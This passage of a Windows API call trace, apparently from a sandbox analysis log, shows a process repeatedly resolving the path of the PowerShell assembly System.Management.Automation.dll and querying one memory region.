lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.070] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.070] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.070] VirtualQuery (in: lpAddress=0x1ab230, lpBuffer=0x1ac0f0, dwLength=0x30 | out: lpBuffer=0x1ac0f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.071] VirtualQuery (in: lpAddress=0x1ab2c0, lpBuffer=0x1ac180, dwLength=0x30 | out: lpBuffer=0x1ac180*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.072] VirtualQuery (in: lpAddress=0x1abcd0, lpBuffer=0x1acb90, dwLength=0x30 | out: lpBuffer=0x1acb90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.074] VirtualQuery (in: lpAddress=0x1abcd0, lpBuffer=0x1acb90, dwLength=0x30 | out: lpBuffer=0x1acb90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.075] VirtualQuery (in: lpAddress=0x1abcd0, lpBuffer=0x1acb90, dwLength=0x30 | out: lpBuffer=0x1acb90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.076] VirtualQuery (in: lpAddress=0x1abcd0, lpBuffer=0x1acb90, dwLength=0x30 | out: lpBuffer=0x1acb90*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.077] VirtualQuery (in: lpAddress=0x1ab3c0, lpBuffer=0x1ac280, dwLength=0x30 | out: lpBuffer=0x1ac280*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.077] VirtualQuery (in: lpAddress=0x1ab450, lpBuffer=0x1ac310, dwLength=0x30 | out: lpBuffer=0x1ac310*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.077] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.077] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.078] VirtualQuery (in: lpAddress=0x1abb30, lpBuffer=0x1ac9f0, dwLength=0x30 | out: lpBuffer=0x1ac9f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.078] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.078] VirtualQuery (in: lpAddress=0x1abbc0, 